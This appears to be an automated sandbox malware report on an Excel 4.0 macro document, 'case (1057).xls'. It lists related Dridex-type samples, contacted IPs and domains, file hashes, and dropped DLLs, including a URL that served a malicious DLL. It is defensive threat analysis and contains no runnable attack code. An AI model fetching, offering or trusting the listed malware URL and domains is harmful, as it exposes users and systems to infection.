                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    The Mental Health Center.xlsxGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    SC-TR1167700000.xlsxGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (348).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (426).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (250).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (1447).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (850).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    SecuriteInfo.com.Heur.18472.xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case (1543).xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109
                                                    case_1581.xlsGet hashmaliciousBrowse
                                                    • 172.67.150.228
                                                    • 104.21.73.69
                                                    • 104.21.44.135
                                                    • 172.67.198.109

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    C:\ProgramData\formnet.dllcase (4374).xlsGet hashmaliciousBrowse
                                                      case (4335).xlsGet hashmaliciousBrowse
                                                        case (1522).xlsGet hashmaliciousBrowse
                                                          case (4374).xlsGet hashmaliciousBrowse
                                                            case (166).xlsGet hashmaliciousBrowse
                                                              C:\Users\user\AppData\Roaming\Yzub\doa.dllcase (4374).xlsGet hashmaliciousBrowse
                                                                case (4335).xlsGet hashmaliciousBrowse
                                                                  case (1522).xlsGet hashmaliciousBrowse
                                                                    case (4374).xlsGet hashmaliciousBrowse
                                                                      case (166).xlsGet hashmaliciousBrowse
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllcase (4374).xlsGet hashmaliciousBrowse
                                                                          case (4335).xlsGet hashmaliciousBrowse
                                                                            case (1522).xlsGet hashmaliciousBrowse
                                                                              case (4374).xlsGet hashmaliciousBrowse
                                                                                case (166).xlsGet hashmaliciousBrowse

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\formnet.dll
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):933888
                                                                                  Entropy (8bit):6.687983171155114
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                                                  MD5:B0F3FA047F6AE39A145FD364F693638E
                                                                                  SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                                                  SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                                                  SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                                                  Malicious:true
                                                                                  Joe Sandbox View:
                                                                                  • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                  • Filename: case (4335).xls, Detection: malicious, Browse
                                                                                  • Filename: case (1522).xls, Detection: malicious, Browse
                                                                                  • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                  • Filename: case (166).xls, Detection: malicious, Browse
                                                                                  Reputation:low
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:downloaded
                                                                                  Size (bytes):933888
                                                                                  Entropy (8bit):6.687983171155114
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                                                  MD5:B0F3FA047F6AE39A145FD364F693638E
                                                                                  SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                                                  SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                                                  SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                                                  Malicious:true
                                                                                  Joe Sandbox View:
                                                                                  • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                  • Filename: case (4335).xls, Detection: malicious, Browse
                                                                                  • Filename: case (1522).xls, Detection: malicious, Browse
                                                                                  • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                  • Filename: case (166).xls, Detection: malicious, Browse
                                                                                  Reputation:low
                                                                                  IE Cache URL:https://rnollg.com/kev/scfrd.dll
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\0CEE0000
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):59781
                                                                                  Entropy (8bit):7.769700892139639
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQwz0:SwmW+aB3viH/WaI5xGVpoWpglz0
                                                                                  MD5:96506B88A8B4897447C2DA1F9D7FFD71
                                                                                  SHA1:5957A5F62CBD61CA5B251D8C600AFD1F3200305C
                                                                                  SHA-256:6C2ACB7F16D49250E36727ED7407CB5222AB8B2861C545098D8EBBB088CCF5EF
                                                                                  SHA-512:0DE6F3AB08375EAC57D6D145BB763A1AB8689C4F43F3B0F256884C6A0C592CF872BF14F158E2D495F8623C361906DC65DA34B04F9256118AB16B3442E0087E9F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...*E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a.*.BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:37:45 2021, atime=Wed Jan 27 04:37:45 2021, length=12288, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):867
                                                                                  Entropy (8bit):4.478981038639082
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:85Q5NLgXg/XAlCPCHaXtB8XzB/2WGoQX+WnicvbbbDtZ3YilMMEpxRljKPTdJP9O:85kn/XTd6j95QYebDv3q2rNru/
                                                                                  MD5:D17536E1426C67D544B2D72DC5DE3799
                                                                                  SHA1:09550A083E191631D657C94E2795FB4DECE5AF4C
                                                                                  SHA-256:E6043CC648368E153ACF3D55A766F13A3BBF15A4208A4A1C33A9AD9607BFC082
                                                                                  SHA-512:FC1FE27B0B9EB079D4CE6F52C2FE3F8A38210E5A7B8B4191D443E92BF145EC7B497FFCC2E91F22F170C65A9B193ED3FBC07D22B531AE74B45B133520526DE953
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: L..................F...........7G..r.e.n...r.e.n....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;R.,..Desktop.d......QK.X;R.,*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\302494\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......302494..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (1057).LNK
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Jan 27 04:37:45 2021, atime=Wed Jan 27 04:37:46 2021, length=99328, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):4076
                                                                                  Entropy (8bit):4.537499931408496
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:8Sk/XojFkNS32Qh2Sk/XojFkNS32Qh2Ik/XojFkNS32Qh2Ik/XojFkNS32Q/:8SZjFeQESZjFeQEIZjFeQEIZjFeQ/
                                                                                  MD5:FB04A916D694DF3124E42A15E0CB6443
                                                                                  SHA1:8BB0642C12F2B68059C66127D5554CCA241443BF
                                                                                  SHA-256:55A3325CA98295F7B2CBE5C6DAC96F26F5A39738DC1F41A9094EC29A8A20CA9C
                                                                                  SHA-512:2532A043F2FAA5C2E6D6198DADE77E6B0097222073528B5A2B3684E3596190819BF542BD6805191D82DF180B053D048D54DA694A44159B820FD201B3A8834C31
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: L..................F.... ...&...{..r.e.n....to.n................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.%d..;R., .CASE(1~1.XLS..L.......Q.y.Q.y*...8.....................c.a.s.e. .(.1.0.5.7.)...x.l.s.......y...............-...8...[............?J......C:\Users\..#...................\\302494\Users.user\Desktop\case (1057).xls.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.1.0.5.7.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......302494..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):176
                                                                                  Entropy (8bit):4.499920910709369
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:oyBVomMAMLUeIEMLUmMAMLUeIEMLUmMAMLUeIEMLUmMAMLUv:dj6AKJKmAKJKmAKJKmAK2
                                                                                  MD5:46B3042494EAFEC48753A085FA3C43F2
                                                                                  SHA1:0CB9D82BF8EC6B434F39762F6E77590381D64E85
                                                                                  SHA-256:5073BC52701AB83F1BBF99326644E3EA91FF8004CF7550C9C6BFF3F9EBF6D828
                                                                                  SHA-512:E67E7CD19B310EF6276C01A08D302A0413DEF27C5A516D40CBAEDE9F9FF3EB725BAE17730FF20DB2821E8CD08E2F81D344CD9BA3C31F8E2C584DFD4A151021C2
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: Desktop.LNK=0..[xls]..case (1057).LNK=0..case (1057).LNK=0..[xls]..case (1057).LNK=0..case (1057).LNK=0..[xls]..case (1057).LNK=0..case (1057).LNK=0..[xls]..case (1057).LNK=0..
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\6E2XX33J.txt
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):116
                                                                                  Entropy (8bit):4.467932264038003
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:GmM/0DMKECHTNHHdw2lSN+BT2SUd2WpvW3TRRhvXn:XM/xUt9webl24Wvc35Xn
                                                                                  MD5:BC51AD6D86E70DA86A624A9592B84320
                                                                                  SHA1:7D8820A967C16C776B636E0347ADD6F69C4F8550
                                                                                  SHA-256:8F1F517526828293A6F6FD66074E3AE2B81AD50E10C07940779761A63D75A204
                                                                                  SHA-512:F7F69095657F258706A19113BB458056F9DAADE426923396968ADC261A5253EB05475CC5C71F76B75DED13744F98AD5B8DECDF3B9C45DDCB06AE36EE5B3E3812
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  IE Cache URL:gadgetswolf.com/
                                                                                  Preview: __cfduid.da8f10a211fa7297b3f2769c41fe961d31611693529.gadgetswolf.com/.9728.947327616.30870454.1395433602.30864495.*.
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\A8FFZF1B.txt
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):118
                                                                                  Entropy (8bit):4.4631998046001735
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:GmM/UglUvyQT0qKJpKfcSNAK2SUa5cF4udRhvXn:XM/gvyQ4qv0HK2a5cl5Xn
                                                                                  MD5:F671FBD2FBEFEF1791AE27109DA50175
                                                                                  SHA1:9D79D13F382529E9F67701CB32941304BB8DF934
                                                                                  SHA-256:AE489FE22A9E565AA940052E520676CEDA20E889C5CD6921C511219B377B35B8
                                                                                  SHA-512:A77F2540B1710A2615BCE50C893FE00E7481C7D650C714122C64BD62B15FCC1F1DE754144DD6A90C77D3817003A4B07BB9A908E083FA7ED5CDE95A5A2BCE1E0F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  IE Cache URL:homesoapmolds.com/
                                                                                  Preview: __cfduid.d5d3eb920f294449f1c9c9384e68085d51611693530.homesoapmolds.com/.9728.957327616.30870454.1406977623.30864495.*.
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HPDR9FYI.txt
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):111
                                                                                  Entropy (8bit):4.404751650479022
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:GmM/mPHhCWWBRTHWEPK6AoGT0cSNEQgUT2SUfFudRgvX:XM/OB8B1HWS7jSPK2fag/
                                                                                  MD5:46BA3B0F9B7E8A14827348496984EB5B
                                                                                  SHA1:6D039D97D25D5FEFC013C243615DCAADA337B573
                                                                                  SHA-256:AD9C20F5E0CA87876C650764373C1A50C9101D18B90AB6433B6C33916A5A4105
                                                                                  SHA-512:9901F42375C90F2B8FD96B358058D2557CA170CB34EB959E3C9493DC15C6521DFEC8EA5ED26310B107DB06377DA93544E00D62E40D031D06144FF44F31859733
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  IE Cache URL:rnollg.com/
                                                                                  Preview: __cfduid.ddb3f9db095ea4b1b77d21d33d469f13a1611693494.rnollg.com/.9728.597327616.30870454.2331920260.30864494.*.
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\TXFJIAR6.txt
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):114
                                                                                  Entropy (8bit):4.290777651284624
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:GmM/1GWXBEUndiHKBUTUKPMdl1cS8gUT2SUahUaLVRRRhvXn:XM/1BREIBUYkqlV812avj5Xn
                                                                                  MD5:070B9681D06F299E6E66C79320D22753
                                                                                  SHA1:8F5C298E04698FB570C12B1CCADA589D5BF35B5A
                                                                                  SHA-256:D3364AC7B57548F74E6611033AA5B308470B8BEEEF734E21A157EF333C68A4A1
                                                                                  SHA-512:AE9D2347A34F5EE04A592EC3C9473B5135F23E344D6189DA570D8CDBBAB6757111647F25AD25A06E1EC9EC1996C5BE3392CCA8DD7FF0B4A0C88D7CD64DE88479
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  IE Cache URL:govemedico.tk/
                                                                                  Preview: __cfduid.dfc18c32d8044506683938c277576c5631611693531.govemedico.tk/.9728.967327616.30870454.1413061633.30864495.*.
                                                                                  C:\Users\user\AppData\Roaming\Yzub\doa.dll
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):933888
                                                                                  Entropy (8bit):6.687983171155114
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                                                  MD5:B0F3FA047F6AE39A145FD364F693638E
                                                                                  SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                                                  SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                                                  SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                                                  Malicious:false
                                                                                  Joe Sandbox View:
                                                                                  • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                  • Filename: case (4335).xls, Detection: malicious, Browse
                                                                                  • Filename: case (1522).xls, Detection: malicious, Browse
                                                                                  • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                  • Filename: case (166).xls, Detection: malicious, Browse
                                                                                  Reputation:low
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\Desktop\0DEE0000
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                  Category:dropped
                                                                                  Size (bytes):173366
                                                                                  Entropy (8bit):5.331259235205298
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:9xrtdAOtyoVlDGUUlEfblBiPP58LmlPi+aEvthlXaEv93a6DxrtdAOtyoVlDGUUo:9xrtdAOtyoVlDGUUlEfblBeP52mlPi+r
                                                                                  MD5:8C8D7D84B2CB8F595EE3FC5738CAE230
                                                                                  SHA1:336EF5E051F17307FCCD0824165816592FE59D94
                                                                                  SHA-256:339FECDBAC760952F2BE49CD806FC08F983053F2BFCBC921FB0677F57DE99D52
                                                                                  SHA-512:4441451B64BE5EB008791C751DBDB99E4443F8ABEADB7B3AE10AE96F5E47D32132CA6C7D50C3A9D429ADAD0D9DC96B5882F25550EA73F12157331DA4F79C4AE2
                                                                                  Malicious:false
                                                                                  Preview: ........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
                                                                                  Entropy (8bit):3.8737964753083376
                                                                                  TrID:
                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                  File name:case (1057).xls
                                                                                  File size:156709
                                                                                  MD5:cbc37bc9a7ec9836c033708d090db81c
                                                                                  SHA1:a1fbde54662fb5cdb677f5841a3603df30345108
                                                                                  SHA256:95e0295b15b7c624febe347f44747dada5cb1fc79b73561b3153af81b351a8de
                                                                                  SHA512:03c04ea7f7f64836491fa345f075f86f9e983770e0ce174daa2ee187a79c748b548b82c3a1c4f870d6390a616a03a8f713795c2b902d788c4bc2aa17e21d2f05
                                                                                  SSDEEP:3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g1Z:49SUz4tH8vsderSh1yRNJdaAtH8U5B6W
                                                                                  File Content Preview:........................>.......................0...........................-......./..........................................................................................................................................................................

                                                                                  File Icon

                                                                                  Icon Hash:e4eea286a4b4bcb4

                                                                                  Static OLE Info

                                                                                  General

                                                                                  Document Type:OLE
                                                                                  Number of OLE Files:1

                                                                                  OLE File "case (1057).xls"

                                                                                  Indicators

                                                                                  Has Summary Info:True
                                                                                  Application Name:Microsoft Excel
                                                                                  Encrypted Document:False
                                                                                  Contains Word Document Stream:False
                                                                                  Contains Workbook/Book Stream:True
                                                                                  Contains PowerPoint Document Stream:False
                                                                                  Contains Visio Document Stream:False
                                                                                  Contains ObjectPool Stream:
                                                                                  Flash Objects Count:
                                                                                  Contains VBA Macros:False

                                                                                  Summary

                                                                                  Code Page:1251
                                                                                  Author:
                                                                                  Last Saved By:
                                                                                  Last Printed:2021-01-26 16:17:13
                                                                                  Create Time:2020-04-23 12:26:24
                                                                                  Last Saved Time:2021-01-26 16:28:15
                                                                                  Creating Application:Microsoft Excel
                                                                                  Security:0

                                                                                  Document Summary

                                                                                  Document Code Page:1251
                                                                                  Thumbnail Scaling Desired:False
                                                                                  Company:
                                                                                  Contains Dirty Links:False

                                                                                  Streams

                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                  General
                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                  File Type:data
                                                                                  Stream Size:4096
                                                                                  Entropy:0.843601759481
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00
                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                  General
                                                                                  Stream Path:\x5SummaryInformation
                                                                                  File Type:data
                                                                                  Stream Size:4096
                                                                                  Entropy:0.362148031008
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00
                                                                                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752
                                                                                  General
                                                                                  Stream Path:Book
                                                                                  File Type:Applesoft BASIC program data, first line number 8
                                                                                  Stream Size:145752
                                                                                  Entropy:3.94377585798
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
                                                                                  Data Raw:09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                  Macro 4.0 Code

